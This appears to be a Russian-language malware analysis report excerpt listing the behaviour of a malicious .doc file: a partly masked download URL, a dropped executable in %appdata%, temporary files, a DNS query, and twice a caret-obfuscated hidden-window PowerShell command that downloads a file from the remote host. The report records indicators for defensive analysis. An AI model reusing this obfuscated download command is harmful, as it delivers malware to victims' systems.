Техническая информация
- http://go#####egoidnei799.com/ttt/2002.exe как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /C "p^o^WE^R^SHe^ll.eXE -^E^x^EC^U^t^I^oN^pol^icY byP^ass ^-^N^oPRoFIlE -^wIn^dOW^St^yLe^ h^IdDEN ^(neW^-^oBJ^ECT s^YsteM.nEt.W^e^bC^L^I^EN^t)^.^D^OWNloA^Df^IL^e('http://go#####e...
- <Текущая директория>\~wrd0000.tmp
- <Текущая директория>\~wrd0001.tmp
- <Текущая директория>\~wrd0000.tmp
- <PATH_SAMPLE>.doc
- DNS ASK go#####egoidnei799.com
- '<SYSTEM32>\cmd.exe' /C "p^o^WE^R^SHe^ll.eXE -^E^x^EC^U^t^I^oN^pol^icY byP^ass ^-^N^oPRoFIlE -^wIn^dOW^St^yLe^ h^IdDEN ^(neW^-^oBJ^ECT s^YsteM.nEt.W^e^bC^L^I^EN^t)^.^D^OWNloA^Df^IL^e('http://go#####e...' (со скрытым окном)